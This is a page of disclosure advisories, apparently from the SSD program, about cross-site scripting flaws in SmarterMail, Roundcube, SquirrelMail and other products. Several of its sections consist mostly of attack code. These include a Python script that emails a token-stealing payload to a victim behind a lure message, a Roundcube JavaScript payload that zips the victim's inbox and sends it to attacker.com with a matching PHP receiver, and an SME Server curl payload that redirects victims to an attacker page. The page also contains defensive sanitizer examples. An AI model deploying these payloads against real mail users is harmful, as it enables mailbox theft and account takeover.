SSD Advisory – SmarterMail XSS

TL;DR

Find out how a cross site scripting vulnerability in SmarterMail allows remote attackers to obtain the JWT token used to authenticate the user.

Vulnerability Summary

SmarterMail offers “all of the same features as Microsoft Exchange, but at a FRACTION of the cost. Unlike Exchange, features like audio and video group chat, and Team Workspaces for team meetings and group collaboration are included at no extra charge”.

SmarterMail is “the only on-prem email alternative to Exchange for web hosts, ISPs, small businesses and enterprises that want Exchange-level functionality, but without the high costs associated with Exchange”.

SmarterMail does not properly encode, sanitise or escape message contents when an incoming email is rendered in the web client. As a result, a crafted email can steal the victim’s JWT token, which authorises every operation the user performs against the server.

CVE

CVE-2021-35519

Credit

An independent security researcher, honeydew2, has reported this vulnerability to the SSD Secure Disclosure program.

Affected Versions

SmarterMail Build 7817

Vendor Response

The vendor has released a patch, SmarterMail Build 7845, which resolves the issue.

Vulnerability Analysis

SmarterMail renders incoming HTML emails for users automatically, and its HTML renderer does not properly filter the incoming markup for malicious content.

There is an attempt to filter out malicious <script> tags and similar content, but the check only matches tags whose attributes are separated by a space: if the attributes are separated by “/” instead, the HTML renderer processes the markup and shows it to the user. For example, sending a victim this HTML:

<img/src/onerror=alert(sessionStorage.getItem('token'))>

results in the HTML renderer returning the following HTML to the user:

<img src onerror=alert(sessionStorage.getItem('token'))>

which displays, inside an alert, the token SmarterMail keeps in sessionStorage and uses to authenticate the user against the product. Because the token is held in sessionStorage rather than an HttpOnly cookie, any script that runs in the page can read it.
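The bypass works because a filter that tokenises attributes on whitespace never sees the attribute names a browser’s tokeniser extracts. The following Python is added here as an illustration and is not code from the advisory or from SmarterMail: it contrasts such a filter with a check built on html.parser, which separates attributes on “/” the way browsers do, and then re-serialises the markup from an allowlist so that the delimiter used in the input cannot matter. The allowlists, the naive_filter_flags model of the unpatched check and the sanitize function are illustrative assumptions. It goes one step beyond the advisory by also running an SVG xlink:href link of the kind the SquirrelMail advisory further down describes, to show that the allowlist approach covers that case as well.

```python
import html
import re
from html.parser import HTMLParser

# Constructed inputs: the advisory's "/"-delimited payload, the space-delimited
# form the renderer turns it into, and an SVG link with a namespaced href.
BYPASS = "<img/src/onerror=alert(sessionStorage.getItem('token'))>"
ORDINARY = "<img src onerror=alert(sessionStorage.getItem('token'))>"
SVG_LINK = '<svg><a xlink:href="javascript:alert(1)">click</a></svg>'

# Illustrative allowlists (assumption); SmarterMail's real policy is not known
# from the advisory.
ALLOWED_TAGS = {"div", "p", "br", "b", "i", "a", "img"}
ALLOWED_ATTRS = {"src", "href", "alt", "title"}
VOID_TAGS = {"br", "img"}
SAFE_URL_SCHEMES = ("http:", "https:", "mailto:", "cid:")


def naive_filter_flags(markup):
    """Assumed model of the unpatched check: everything after the tag name is
    split on whitespace, so attributes separated by '/' are never examined."""
    for inner in re.findall(r"<([^>]*)>", markup):
        for token in inner.split()[1:]:
            if token.lower().startswith("on"):
                return True
    return False


class _HandlerFinder(HTMLParser):
    """Record every on* attribute a browser-grade tokeniser produces."""

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:        # names are already lower-cased
            if name.startswith("on"):
                self.found.append((tag, name, value))


def tokenizer_event_handlers(markup):
    """Return (tag, attribute, value) for each event handler html.parser sees."""
    parser = _HandlerFinder()
    parser.feed(markup)
    parser.close()
    return parser.found


def _url_is_safe(value):
    """Allow relative URLs and a few schemes; javascript:, data:, ... are dropped."""
    v = (value or "").strip().lower()
    scheme = v.split(":", 1)[0] if ":" in v else ""
    return scheme == "" or scheme + ":" in SAFE_URL_SCHEMES


class _Sanitizer(HTMLParser):
    """Rebuild the markup from parsed tokens with an allowlist, so the output
    does not depend on how attributes were delimited in the input."""

    def __init__(self):
        super().__init__()
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return                           # tag dropped, its text is kept
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS:
                continue                     # drops on*, style, xlink:href, ...
            if name in ("src", "href") and not _url_is_safe(value):
                continue
            kept.append(f' {name}="{html.escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))


def sanitize(markup):
    """Return allowlisted markup re-serialised from the parsed tokens."""
    s = _Sanitizer()
    s.feed(markup)
    s.close()
    return "".join(s.out)


if __name__ == "__main__":
    for sample in (BYPASS, ORDINARY, SVG_LINK):
        print(sample)
        print("  naive filter flags it:", naive_filter_flags(sample))
        print("  tokenizer handlers:   ", tokenizer_event_handlers(sample))
        print("  sanitized:            ", sanitize(sample))
```

The point of the second half is that a sanitizer should never reason about the raw string: it parses with the same tokenizer rules the browser uses and emits only what it has positively approved, so `<img/src/onerror=…>` and `<img src onerror=…>` both come out as `<img src="">`.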

Exploit

#!/usr/bin/python3

# Sends two messages to the victim: a plain-text lure, then the message that
# carries the XSS payload. SmarterMail renders the second message's HTML and
# the onerror handler runs in the victim's session.
import smtplib
from email.message import EmailMessage

server = "192.168.15.50"            # SmarterMail SMTP listener
sender = 'admin@smartermail-test.com'
victim = 'user1@smartermail-test.com'


def send(msg):
    s = smtplib.SMTP(server)
    s.set_debuglevel(1)             # print the SMTP dialogue
    s.send_message(msg)
    s.quit()


# Lure: points the victim at the second email
msg = EmailMessage()
msg['Subject'] = 'Welcome to Smartermail'
msg['From'] = sender
msg['To'] = victim
msg.set_content("Welcome to smartermail, you can immediately start using it -just click on the Test email to get started")
send(msg)

# Payload: the <img> uses "/" instead of spaces between its attributes, which
# the renderer's filter does not recognise
msg = EmailMessage()
msg['Subject'] = 'Test email'
msg['From'] = sender
msg['To'] = victim
msg.add_alternative(
    '<div style="font-family: arial; font-size: 14px;">'
    '<div fr-original-style="" style="box-sizing: border-box;"><br fr-original-style="" style="box-sizing: border-box;"></div>'
    '<div fr-original-style="" style="box-sizing: border-box;"><br fr-original-style="" style="box-sizing: border-box;"></div>'
    '<div fr-original-style="" style="box-sizing: border-box;">'
    "<img/src/onerror=alert(sessionStorage.getItem('token'))>"
    '</div></div>',
    subtype="html")
send(msg)

Demo

SSD Advisory – Roundcube Incoming Emails Stored XSS

TL;DR

Find out how we exploited the Roundcube webmail application by crafting an email containing malicious HTML that executes arbitrary JavaScript code in the context of the vulnerable user’s inbox.

Vulnerability Summary

Roundcube webmail is a browser-based multilingual IMAP client with an application-like user interface.
An input sanitization vulnerability in Roundcube can be exploited to perform stored cross-site scripting (XSS) attacks.

CVE

CVE-2020-15562

Credit

An independent Security Researcher, Andrea Cardaci, has reported this vulnerability to SSD Secure Disclosure program.

Affected Systems

Roundcube versions:
– 1.3.8
– 1.3.9
– 1.4 (current main branch)

Vendor Response

The vendor acknowledged the vulnerability and fixed it; see the vendor advisory for more details: https://roundcube.net/news/2020/07/05/security-updates-1.4.7-1.3.14-and-1.2.11

Vulnerability Details

Roundcube uses a custom version of Washtml (an HTML sanitizer) to display untrusted HTML in email messages. One of the modifications adds SVG support[svg-support]; in particular, an exception has been added in rcube_washtml.php for the svg tag to properly handle XML namespaces (dumpHtml function):

if ($tagName == 'svg') {
    $xpath = new DOMXPath($node->ownerDocument);
    foreach ($xpath->query('namespace::*') as $ns) {
        if ($ns->nodeName != 'xmlns:xml') {
            $dump .= ' ' . $ns->nodeName . '="' . $ns->nodeValue . '"';
        }
    }
}

This snippet uses an XPath query to list every XML namespace in scope for the root element of the HTML message (except the implicit xml namespace) and adds each one to the svg tag as an attribute. The vulnerable part is that $ns->nodeName and $ns->nodeValue are appended to $dump without proper sanitization (e.g., htmlspecialchars).

[svg-support] Introduced in commit a1fdb205f824dee7fd42dda739f207abc85ce158.

There are a number of things to consider in order to manage to successfully inject arbitrary HTML code.

First, if the HTML message lacks the head tag (or alternatively a meta specifying the charset, in newer releases) then Roundcube appends a default preamble to the message; this is undesirable as the goal is to control the root element. (Also note that the svg tag itself cannot be the root element.)

Second, when at least one svg tag is present (and the <html string is not) the message is parsed using DOMDocument::loadXML[dom-node], which requires a well-formed XML document.

Finally, since DOMDocument::loadXML decodes entity references during parsing, &quot; can be used to break out of the hard-coded double quotes in the above snippet, and &lt; / &gt; to escape the svg element altogether.

Since the namespaces are added to the svg tag, a simple way to exploit this vulnerability is to use the onload event:

<head xmlns="&quot; onload=&quot;alert(document.domain)"><svg></svg></head>

The resulting HTML is:

<svg xmlns="" onload="alert(document.domain)" />

It is likewise possible to escape the svg tag entirely and inject a script tag:

<head xmlns="&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;"><svg></svg></head>

The resulting HTML is:

<svg xmlns=""><script>alert(document.domain)</script>" />

[dom-node]  In the above snippet $node is an instance of DOMNode.
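To see the two ingredients of the bug together (the XML parser decoding entity references inside the xmlns value, and that value being concatenated into the svg tag unescaped), here is an added Python model of the dumpHtml branch above. It is illustrative code, not Roundcube’s PHP: ElementTree’s start-ns events stand in for the XPath namespace::* query, the payload byte strings are constructed copies of the two payloads shown above, and the escape flag switches between the vulnerable concatenation and the htmlspecialchars-style fix.

```python
import html
import io
import xml.etree.ElementTree as ET

# Constructed copies of the advisory's two payloads as they appear on the wire;
# the &quot; / &lt; / &gt; entities are what loadXML decodes.
PAYLOAD_ONLOAD = (
    b'<head xmlns="&quot; onload=&quot;alert(document.domain)"><svg></svg></head>'
)
PAYLOAD_SCRIPT = (
    b'<head xmlns="&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;">'
    b'<svg></svg></head>'
)


def namespace_decls(xml_bytes):
    """Stand-in for $xpath->query('namespace::*'): the (name, value) pairs of
    the namespace declarations expat reports while parsing the document.
    Entity references in the attribute value are already decoded here."""
    decls = []
    for _event, (prefix, uri) in ET.iterparse(io.BytesIO(xml_bytes),
                                              events=("start-ns",)):
        name = "xmlns" if prefix == "" else "xmlns:" + prefix
        decls.append((name, uri))
    return decls


def dump_svg(xml_bytes, escape):
    """Rebuild the svg start tag the way dumpHtml does, with or without the
    escaping that the fix added."""
    dump = "<svg"
    for name, value in namespace_decls(xml_bytes):
        if name != "xmlns:xml":              # same exclusion as the PHP code
            if escape:
                value = html.escape(value, quote=True)
            dump += ' ' + name + '="' + value + '"'
    return dump + " />"


def dump_svg_vulnerable(xml_bytes):
    return dump_svg(xml_bytes, escape=False)


def dump_svg_fixed(xml_bytes):
    return dump_svg(xml_bytes, escape=True)


if __name__ == "__main__":
    for payload in (PAYLOAD_ONLOAD, PAYLOAD_SCRIPT):
        print("vulnerable:", dump_svg_vulnerable(payload))
        print("fixed:     ", dump_svg_fixed(payload))
```

Run stand-alone, the vulnerable branch prints exactly the two resulting tags shown above, while the fixed branch keeps the attacker’s text inside the xmlns attribute value as &quot;, &lt; and &gt;.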

Exploit

Possibly one of the most effective ways to demonstrate the impact of this vulnerability is to exploit the zipdownload plugin (enabled by default) to fetch the whole inbox[uid] as a zipped MBOX file and then upload it to a web server controlled by the attacker via a POST request:

(async () => {
    const uploadEndpoint = 'http://attacker.com:8080/upload.php';

    // download the whole inbox as a zip file
    const response = await fetch('?_task=mail&_action=plugin.zipdownload.messages', {
        method: 'POST',
        credentials: 'include',
        headers: {
            'content-type': 'application/x-www-form-urlencoded'
        },
        body: `_mbox=INBOX&_uid=*&_mode=mbox&_token=${rcmail.env.request_token}`
    });

    // prepare the upload form
    const formData = new FormData();
    const inboxZip = await response.blob();
    formData.append('inbox', inboxZip, 'INBOX.mbox.zip');

    // send the zip file to the attacker
    return fetch(uploadEndpoint, {
        method: 'POST',
        mode: 'no-cors',
        body: formData
    });
})();

To avoid having to write & as an entity inside the attribute value, the whole script can be Base64-encoded. The final payload becomes:

<head xmlns="&quot; onload=&quot;eval(atob('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'))"><svg></svg></head>

The POST request can easily be received by PHP’s built-in web server; for example, create an upload.php file with:

<?php
$file = $_FILES['inbox'];
move_uploaded_file($file['tmp_name'], $file['name']);

Then start the server with:

$ php -S 0.0.0.0:8080

If the XSS is successfully triggered then an INBOX.mbox.zip file is created in the current directory.

[uid] The _uid POST field can also be an array, which allows the inbox to be exfiltrated in chunks.

Demo

SquirrelMail – Incoming e-Mails Stored XSS

Abstract
SquirrelMail allows HTML messages to be displayed provided that unsafe fragments are redacted. An input sanitization vulnerability that can be exploited to perform stored cross-site scripting (XSS) attacks has been discovered.
A remote attacker can send a specially crafted e-mail containing malicious HTML and execute arbitrary JavaScript code in the context of the vulnerable webmail interface when the user displays the message. This effectively grants the attacker the same privileges as the authenticated victim; in particular it enables the attacker to (among other things) send e-mail messages on behalf of the victim, fetch conversations from folders, delete or otherwise manage messages, log the victim out of SquirrelMail, etc.
It is likely that even prior versions are affected, since this does not appear to be a regression but merely an insufficient implementation.
Details
The HTML sanitizer uses a blacklist approach based on tag and attribute names to recognize potentially dangerous HTML code and decide how to fix it; for example, attributes starting with on are removed as they usually represent event handlers. In particular, the <script> element is deleted and the href attribute may only use certain schemes (e.g., not javascript:), otherwise it is replaced with a void image URL.
It is possible to bypass these checks by using the SVG counterparts of the <a> and <script> elements. These variants expose the href attribute as part of the xlink namespace (for <script> it specifies the resource containing the script code), so it can be set through xlink:href, which SquirrelMail ignores. Moreover, in this context <script> can be self-closing, and the lack of a closing tag is enough to deceive the sanitizer.
Two methods have been devised; to maximize the chances of success it may be advisable to employ both.
Credit
An independent security researcher, Andrea Cardaci, has reported this vulnerability to SSD Secure Disclosure program.
Affected versions
SquirrelMail version 1.4.23 (SM-1_4-STABLE @ r14746)
SquirrelMail version 1.5.2 (trunk @ r14747)

No user action required
This solution only works with Firefox and Edge [1] and requires no additional interaction from the user:

(more…)

SSD Advisory – MDaemon Mail Server Multiple XSS Vulnerabilities

Vulnerabilities Summary
The following advisory describes two XSS vulnerabilities found in MDaemon Mail Server which let attackers send emails carrying malicious payloads and run client-side code in the victim’s browser as soon as the victim opens the email.

CVE
CVE-2019-8983
CVE-2019-8984

Credit
An independent security researcher, Zhong Zhaochen, has reported these vulnerabilities to the SSD Secure Disclosure program.

(more…)

SSD Advisory – Cisco ISE Unauthenticated XSS to Privileged RCE

Vulnerabilities Summary
Cisco Identity Services Engine (ISE) contains three vulnerabilities that, when chained, allow an unauthenticated attacker to achieve root privileges and execute code remotely. The first is a stored cross-site scripting vulnerability that allows the attacker to upload HTML pages which then execute in the victim’s browser. The second is an already known vulnerability, Unsafe Flex AMF Java Object Deserialization (CVE-2017-5641), which is used in this exploit. The third is a privilege escalation via incorrect sudo file permissions that lets local attackers run code as root.
Vendor Response
“I would like to inform you that we have assigned the CVE-ID, CVE-2018-15440 for the reported XSS vulnerability. The security advisory will be accessible after the publication date (Jan,9th 2019) at the following URL:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190109-ise-multi-xss”
CVE
CVE-2018-15440
Credit
An independent security researcher, Pedro Ribeiro, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.

Affected systems
Cisco Identity Services Engine version 2.4.0
Vulnerability Details
First Vulnerability: Stored Cross Site Scripting
Attack Vector: Remote
The LiveLogSettingsServlet, available at /admin/LiveLogSettingsServlet, contains a stored cross-site scripting vulnerability. Its doGet() HTTP request handler takes an Action parameter as an HTTP query variable, which can be “read” or “write”.
With the “write” action, it calls the writeLiveLogSettings() function, which takes several query string variables such as Columns, Rows, Refresh_rate and Time_period. The content of these query string variables is then written to /opt/CSCOcpm/mnt/dashboard/liveAuthProps.txt, and the server responds with 200 OK.
These parameters are not validated and can contain any text. When the Action parameter equals “read”, the servlet reads the /opt/CSCOcpm/mnt/dashboard/liveAuthProps.txt file and returns it to the user with Content-Type text/html, so whatever was written to that file is rendered and executed by the browser. To mount a simple attack, we can send the following request:

(more…)

SSD Advisory – SME Server Unauthenticated XSS To Privileged Remote Code Execution

Vulnerabilities Summary
The following advisory describes a vulnerability in SME Server 9.2 which lets an unauthenticated attacker perform an XSS attack that leads to remote code execution as root. SME Server is a Linux distribution for small and medium enterprises by the Koozali foundation.
CVE
CVE-2018-18072
Credit
An independent security researcher, Karn Ganeshen has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
Affected systems
SME Server 9.2
Vendor Response
Fixed in phpki-0.82-17.el6.sme, phpki-0.82-18.el6.sme, phpki-0.82-19.el6.sme
Vulnerability Details
Software for SME Server is packaged using the RPM Package Manager (RPM). Existing packages from CentOS and other third-party developers are used, along with packages from the open source community. These packages are called contribs; each contrib adds a specific functionality to the SME Server deployment. Once a contrib is installed, the corresponding menu or web panel is added to the SME HTTP management portal. The default admin user has access to all contrib menus; admin can create a new user and assign that user access to specific web panels (functionality), and the user can then view, access and administer only those web panels.
The vulnerable components are “Certificate Management” and “Advanced Web Statistics”, which are vulnerable to cross-site scripting and cross-site request forgery.
In the following demonstration, the attacker’s IP is 192.168.1.2 and the SME Server’s IP is 192.168.1.109.
Exploitation starts with the PHPKI contrib (smeserver-phpki), which provides the Certificate Management functionality. The administrator adds new certificates, which users can download and install in their browsers. The Certificate Management portal is accessible at https://<SME Server IP>/phpki/.
It should look like this:

All users can access this portal without any authentication. It provides a Search function where a user can search for existing certificates.
Exploit
1) Reflected XSS [Pre-Auth]: https://192.168.1.109/phpki/search.php/"><script>alert("xss-phpki")</script> . This shows that the component is vulnerable to XSS.

Now let’s arm the payload. We will inject the following: "><script>document.location="http://192.168.1.2/ssd.html"</script>
Issue the following request: curl 'https://192.168.1.109/phpki/search.php/"><script>document.location="http://192.168.1.2/ssd.html"</script>' --insecure . This payload is stored on the back-end (stored XSS) and rendered by another contrib, Awstats.
2) Start a web server on Attacker IP to serve our evil form – ssd.html

(more…)

SSD Advisory – Endian Firewall Stored XSS to Remote Command Execution

Vulnerability Summary
The following advisory describes a stored XSS vulnerability in Endian Firewall version 5.0.3; successful exploitation leads to remote code execution.
Endian Firewall is a “security-focused Linux distribution; it is an independent, unified security management operating system. Endian Firewall is based on a hardened Linux operating system.”
Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SSD program.
Vendor Response
The vendor has released a patch for this vulnerability. For more information: https://help.endian.com/hc/en-us/articles/115012996087
(more…)

SSD Advisory – Endian Firewall Stored From XSS to Remote Command Execution

Vulnerability Summary
The following advisory describes a stored cross-site scripting vulnerability that can be used to trigger remote code execution in Endian Firewall version 5.0.3.
Endian Firewall is a “turnkey Linux security distribution, which is an independent, unified security management operating system. The Endian Firewall is based on a hardened Linux operating system.”
Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
Vendor response
Endian has released patches to address this vulnerability.
For more information: https://help.endian.com/hc/en-us/articles/115012996087
(more…)

SSD Advisory – HPE Baseline Smart Gig SFP 24 Switch Pre-authentication Stored XSS

Vulnerability Summary
The following advisory describes an unauthenticated stored XSS in the HPE Baseline Smart Gig SFP 24 / 3Com Baseline Switch 2924 SFP Plus Switch.
The vulnerability affects the following versions:

  • Software Version: 01.00.10
  • Boot version: 1.0.0.14
  • Hardware Version: 01.01.0a

“On April 12, 2010, Hewlett-Packard completed the acquisition of 3Com. Since the acquisition, 3Com has been fully absorbed by Hewlett-Packard and no longer exists as a separate entity.”
Every 3Com model changed its identification number. The new HP name/ID number for this switch is “HP Baseline Smart Gig SFP 24 – JE002A”
There is no other difference between 3CBLSG24 and JE002A.
Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
Vendor response
HPE was informed of the vulnerability, their response was: “This issue is not going to be resolved. We had hoped resources could be found to address the issue, but the business determined that the product is out of support life. It’s been this way for several years. We hoped we could communicate something to customers about the product, but this switch is truly not supported in that way either.”
(more…)

SSD Advisory – Webmin Multiple Vulnerabilities

Vulnerability summary
The following advisory describes three (3) vulnerabilities found in Webmin version 1.850.
Webmin “is a web-based interface for system administration for Unix. Using any modern web browser, you can setup user accounts, Apache, DNS, file sharing and much more. Webmin removes the need to manually edit Unix configuration files like /etc/passwd, and lets you manage a system from the console or remotely. See the standard modules page for a list of all the functions built into Webmin.”
The vulnerabilities found are:

  • XSS vulnerability that leads to Remote Code Execution
  • CSRF Schedule arbitrary commands
  • Server Side Request Forgery

Credit
An independent security researcher, hyp3rlinx, has reported these vulnerabilities to Beyond Security’s SecuriTeam Secure Disclosure program.
Vendor response
Update 1
CVE:

  • CVE-2017-15644
  • CVE-2017-15645
  • CVE-2017-15646

The vendor has released patches to address these vulnerabilities.
For more information: https://github.com/webmin/webmin/commit/0c58892732ee7610a7abba5507614366d382c9c9 and http://www.webmin.com/security.html
(more…)